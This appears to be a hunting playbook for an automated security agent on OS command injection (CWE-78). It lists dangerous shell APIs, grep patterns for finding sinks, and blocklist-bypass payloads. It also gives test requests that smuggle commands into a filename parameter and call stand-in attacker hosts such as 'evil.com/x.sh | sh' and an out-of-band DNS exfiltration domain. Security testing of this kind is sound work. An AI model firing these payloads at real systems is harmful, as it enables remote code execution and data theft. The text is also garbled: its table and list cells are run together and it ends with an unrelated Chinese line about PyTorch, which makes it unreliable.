Hunt OS command injection (CWE-78) — user input reaching shell, exec, or system calls. Covers argument-array bypasses, path confusion, and template-string injection in modern frameworks.
If SQL injection is the king of web vulns, command injection is the king of DevOps vulns. Every image-processing upload, PDF generator, ffmpeg wrapper, and "run a script" feature is a candidate.
| Language | Dangerous | Safer |
|---|---|---|
| Python | os.system, subprocess.Popen(..., shell=True), os.popen, commands.getoutput | subprocess.run([...], shell=False) |
| Node | child_process.exec, execSync | child_process.execFile, spawn (array args) |
| Go | exec.Command("sh","-c",user) | exec.Command(bin, arg1, arg2) with array |
| Java | Runtime.exec(String) | , |
Runtime.exec(String[])ProcessBuilder([...])| Ruby | backticks, system(str), %x{...} | Kernel.system(bin, *args), Open3.capture2e |
| PHP | shell_exec, exec, system, backticks, passthru | escapeshellarg + explicit execve |
Even the "safer" APIs are exploitable if the binary path is user
controlled (exec.Command(userBin, "--version")).
command: is built from user inputpdflatex, wkhtmltopdf, puppeteerconvert user.jpg out.png where user.jpg is
attacker-chosen (classic ImageTragick)-i with user-provided URL/file (SSRF + RCE combo)ssh user@host "cmd" from templatesunzip binary# Level 1: obvious sinks
grep -rE 'os\.system\(|subprocess.*shell\s*=\s*True|exec\s*\(' /workspace/src
grep -rE 'Runtime\.exec\(|ProcessBuilder\([^[]' /workspace/src
grep -rE 'child_process\.(exec|execSync)\(' /workspace/src
# Level 2: shell metacharacters in strings
grep -rE '"[^"]*\$\{[a-z]+\}.*(-[a-z]|[;|&])"' /workspace/src
# Level 3: template strings
grep -rE 'ffmpeg|pdflatex|wkhtmltopdf|convert|pandoc' /workspace/src
Even when developers "sanitize" via blocklists:
-oProxyCommand=curl $(whoami).attacker.com to ssh-based sinks${IFS}, {ls,-la} (brace expansion)$(id), `id`$(curl evil.com/x.sh | sh).jpg" (fullwidth) vs " bypass%0A turns single-command into multi-commandtar xzf user.tgz with --checkpoint-action=exec=...git clone 'ssh://ext::sh -c whoami # foo'# Spare out-of-band tester — DNS exfil confirms silent RCE
curl "https://target.com/export?filename=; curl $(whoami).attacker.oob/"
# Blind, response-timing based
curl "https://target.com/export?filename=; sleep 7 #.pdf"
# Noisy but fastest confirmation
curl "https://target.com/export?filename=; id > /tmp/pwn #.pdf"
validate_finding contractuid=\d+, root, attacker OOB callback hit, total 0report.pdf200, accepted| Variant | Vector | Score |
|---|---|---|
| Blind OOB RCE unauth | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 9.8 |
| Authenticated RCE (low priv) | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 8.8 |
| RCE with scope change (container escape) | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | 10.0 |
Command injection rarely needs chaining — it's the final hop of most
chains. Instead, use it to promote earlier nodes: add enables edges
from SSRF / file upload / path traversal vulns that deliver the
initial payload.
PyTorch深度学习模式与最佳实践,用于构建稳健、高效且可复现的训练流程、模型架构和数据加载。